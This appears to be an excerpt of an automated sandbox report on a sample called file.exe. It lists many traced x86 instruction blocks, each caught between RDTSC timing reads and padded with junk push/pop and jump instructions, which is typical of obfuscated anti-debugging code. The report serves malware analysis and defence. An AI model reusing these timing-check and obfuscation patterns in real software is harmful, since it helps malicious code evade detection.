                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49907C2 second address: 49907C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06D9 second address: 49C06F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06F9 second address: 49C06FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06FD second address: 49C0701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0701 second address: 49C0707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0707 second address: 49C070D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C070D second address: 49C075B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F7E2CD3B848h 0x0000000f push dword ptr [ebp+04h] 0x00000012 pushad 0x00000013 push eax 0x00000014 mov ebx, 59381510h 0x00000019 pop ebx 0x0000001a mov cx, 1BC5h 0x0000001e popad 0x0000001f push dword ptr [ebp+0Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7E2CD3B847h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C075B second address: 49C0761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0761 second address: 49C0765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0765 second address: 49C0790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E2CC83CA5h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A062A second address: 49A0646 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B841h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0646 second address: 49A0659 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0659 second address: 49A065E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A065E second address: 49A0664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1755 second address: 49F1759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1759 second address: 49F175D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F175D second address: 49F1763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1763 second address: 49F1778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83CA1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1778 second address: 49F177C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F177C second address: 49F17C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b jmp 00007F7E2CC83CA3h 0x00000010 jmp 00007F7E2CC83CA8h 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F7E2CC83C9Ah 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F17C2 second address: 49F17D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F17D1 second address: 4990798 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp dword ptr [7598155Ch] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 mov ecx, dword ptr fs:[00000018h] 0x0000001b mov eax, dword ptr [ebp+08h] 0x0000001e mov dword ptr [ecx+34h], 00000000h 0x00000025 cmp eax, 40h 0x00000028 jnc 00007F7E2CC83C9Dh 0x0000002a mov eax, dword ptr [ecx+eax*4+00000E10h] 0x00000031 pop ebp 0x00000032 retn 0004h 0x00000035 test eax, eax 0x00000037 je 00007F7E2CC83CB3h 0x00000039 mov eax, dword ptr [00459710h] 0x0000003e cmp eax, FFFFFFFFh 0x00000041 je 00007F7E2CC83CA9h 0x00000043 mov esi, 00401BB4h 0x00000048 push esi 0x00000049 call 00007F7E3120B290h 0x0000004e mov edi, edi 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 mov edx, 4E901C16h 0x00000058 push edi 0x00000059 pop eax 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498078A second address: 498078E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498078E second address: 4980792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980792 second address: 4980798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0059 second address: 49F00B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 jmp 00007F7E2CC83C9Ah 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e jmp 00007F7E2CC83C9Eh 0x00000013 call 00007F7E2CC83CA2h 0x00000018 mov ebx, ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c mov eax, dword ptr fs:[00000030h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 call 00007F7E2CC83CA4h 0x0000002c pop eax 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F00B1 second address: 49F00D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 74BDh 0x00000007 mov ah, 9Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c sub esp, 18h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7E2CD3B840h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F00D2 second address: 49F00E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F00E8 second address: 49F00FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov edi, 38053E28h 0x0000000e push eax 0x0000000f push edx 0x00000010 mov eax, edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F00FA second address: 49F013D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 jmp 00007F7E2CC83C9Fh 0x0000000d mov ebx, dword ptr [eax+10h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007F7E2CC83C9Bh 0x00000018 pop eax 0x00000019 jmp 00007F7E2CC83CA9h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F013D second address: 49F016D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov dx, 057Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov si, 56D7h 0x00000013 mov esi, 63278973h 0x00000018 popad 0x00000019 mov dword ptr [esp], esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7E2CD3B840h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F016D second address: 49F0173 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0173 second address: 49F01A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [759B06ECh] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 call 00007F7E2CD3B843h 0x00000019 pop esi 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01A5 second address: 49F021C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F7E2CC83CA0h 0x00000010 jne 00007F7E2CC84C0Ah 0x00000016 jmp 00007F7E2CC83CA0h 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d pushad 0x0000001e push esi 0x0000001f pop edi 0x00000020 mov dx, si 0x00000023 popad 0x00000024 call 00007F7E2CC83CA4h 0x00000029 movzx esi, dx 0x0000002c pop edx 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007F7E2CC83C9Dh 0x00000034 xchg eax, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F021C second address: 49F027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CD3B841h 0x00000009 sbb ax, 9946h 0x0000000e jmp 00007F7E2CD3B841h 0x00000013 popfd 0x00000014 mov ah, 7Fh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 call dword ptr [75980B60h] 0x0000001f mov eax, 75F3E5E0h 0x00000024 ret 0x00000025 jmp 00007F7E2CD3B843h 0x0000002a push 00000044h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F7E2CD3B845h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F027F second address: 49F0285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0285 second address: 49F0289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0289 second address: 49F028D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F028D second address: 49F02C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007F7E2CD3B83Fh 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 mov ebx, eax 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov edx, 245A3EECh 0x0000001a popad 0x0000001b xchg eax, edi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7E2CD3B83Eh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F02C3 second address: 49F02C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F02C9 second address: 49F02CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F02CD second address: 49F0320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [eax] 0x0000000a jmp 00007F7E2CC83CA9h 0x0000000f mov eax, dword ptr fs:[00000030h] 0x00000015 jmp 00007F7E2CC83C9Eh 0x0000001a push dword ptr [eax+18h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7E2CC83CA7h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F039B second address: 49F03D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, 0B48h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007F7E2CD3B846h 0x00000019 xor ch, FFFFFFA8h 0x0000001c jmp 00007F7E2CD3B83Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F03D5 second address: 49F047A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F7E9DBC2F4Ch 0x0000000f jmp 00007F7E2CC83C9Eh 0x00000014 sub eax, eax 0x00000016 jmp 00007F7E2CC83CA1h 0x0000001b mov dword ptr [esi], edi 0x0000001d pushad 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F7E2CC83C9Ah 0x00000025 and cx, 3598h 0x0000002a jmp 00007F7E2CC83C9Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov cl, dl 0x00000033 popad 0x00000034 mov dword ptr [esi+04h], eax 0x00000037 pushad 0x00000038 mov ebx, esi 0x0000003a popad 0x0000003b mov dword ptr [esi+08h], eax 0x0000003e pushad 0x0000003f call 00007F7E2CC83CA0h 0x00000044 mov di, cx 0x00000047 pop ecx 0x00000048 push edi 0x00000049 pushad 0x0000004a popad 0x0000004b pop esi 0x0000004c popad 0x0000004d mov dword ptr [esi+0Ch], eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 call 00007F7E2CC83CA0h 0x00000058 pop ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F047A second address: 49F047F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F047F second address: 49F04D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c jmp 00007F7E2CC83CA0h 0x00000011 mov dword ptr [esi+10h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F7E2CC83C9Dh 0x0000001d sub ecx, 01AB2756h 0x00000023 jmp 00007F7E2CC83CA1h 0x00000028 popfd 0x00000029 mov ecx, 741BB0C7h 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F04D6 second address: 49F04F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E2CD3B83Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F04F9 second address: 49F050B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F050B second address: 49F050F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F050F second address: 49F051D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F051D second address: 49F0523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0523 second address: 49F053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+54h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F053F second address: 49F0543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0543 second address: 49F0556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0556 second address: 49F055C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F055C second address: 49F0560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0560 second address: 49F0588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7E2CD3B849h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0588 second address: 49F058E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F058E second address: 49F0594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0594 second address: 49F0598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0598 second address: 49F05E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7E2CD3B840h 0x00000012 xor ax, CD58h 0x00000017 jmp 00007F7E2CD3B83Bh 0x0000001c popfd 0x0000001d mov ch, B2h 0x0000001f popad 0x00000020 mov dword ptr [esi+1Ch], eax 0x00000023 pushad 0x00000024 movsx edi, cx 0x00000027 movzx eax, dx 0x0000002a popad 0x0000002b mov eax, dword ptr [ebx+5Ch] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F7E2CD3B840h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F05E9 second address: 49F062A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b jmp 00007F7E2CC83CA6h 0x00000010 mov eax, dword ptr [ebx+60h] 0x00000013 pushad 0x00000014 mov bx, ax 0x00000017 movzx esi, dx 0x0000001a popad 0x0000001b mov dword ptr [esi+24h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7E2CC83CA0h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07CE second address: 49F07D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07D4 second address: 49F07D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07D8 second address: 49F0890 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B847h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F7E2CD3B844h 0x00000015 or al, 00000028h 0x00000018 jmp 00007F7E2CD3B83Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F7E2CD3B848h 0x00000024 jmp 00007F7E2CD3B845h 0x00000029 popfd 0x0000002a popad 0x0000002b mov eax, dword ptr [ebx+20h] 0x0000002e jmp 00007F7E2CD3B83Eh 0x00000033 mov dword ptr [esi+40h], eax 0x00000036 jmp 00007F7E2CD3B840h 0x0000003b lea eax, dword ptr [ebx+00000080h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F7E2CD3B847h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0890 second address: 49F0958 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CC83C9Fh 0x00000009 add si, F98Eh 0x0000000e jmp 00007F7E2CC83CA9h 0x00000013 popfd 0x00000014 movzx ecx, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push 00000001h 0x0000001c jmp 00007F7E2CC83CA3h 0x00000021 nop 0x00000022 pushad 0x00000023 call 00007F7E2CC83CA4h 0x00000028 pushfd 0x00000029 jmp 00007F7E2CC83CA2h 0x0000002e and al, FFFFFF98h 0x00000031 jmp 00007F7E2CC83C9Bh 0x00000036 popfd 0x00000037 pop esi 0x00000038 pushfd 0x00000039 jmp 00007F7E2CC83CA9h 0x0000003e sbb ch, 00000036h 0x00000041 jmp 00007F7E2CC83CA1h 0x00000046 popfd 0x00000047 popad 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c call 00007F7E2CC83C9Ah 0x00000051 pop esi 0x00000052 mov ecx, edx 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0958 second address: 49F095D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0ACB second address: 49F0ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83C9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0ADB second address: 49F0B1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7E2CD3B844h 0x00000014 and esi, 57244878h 0x0000001a jmp 00007F7E2CD3B83Bh 0x0000001f popfd 0x00000020 pushad 0x00000021 movzx esi, bx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B1C second address: 49F0B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 test edi, edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov edi, eax 0x0000000d mov al, EDh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B2C second address: 49F0B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B32 second address: 49F0B97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F7E9DBC2809h 0x00000011 jmp 00007F7E2CC83CA0h 0x00000016 mov eax, dword ptr [ebp-0Ch] 0x00000019 pushad 0x0000001a mov di, cx 0x0000001d pushfd 0x0000001e jmp 00007F7E2CC83C9Ah 0x00000023 jmp 00007F7E2CC83CA5h 0x00000028 popfd 0x00000029 popad 0x0000002a mov dword ptr [esi+04h], eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 pop ebx 0x00000032 rdtsc
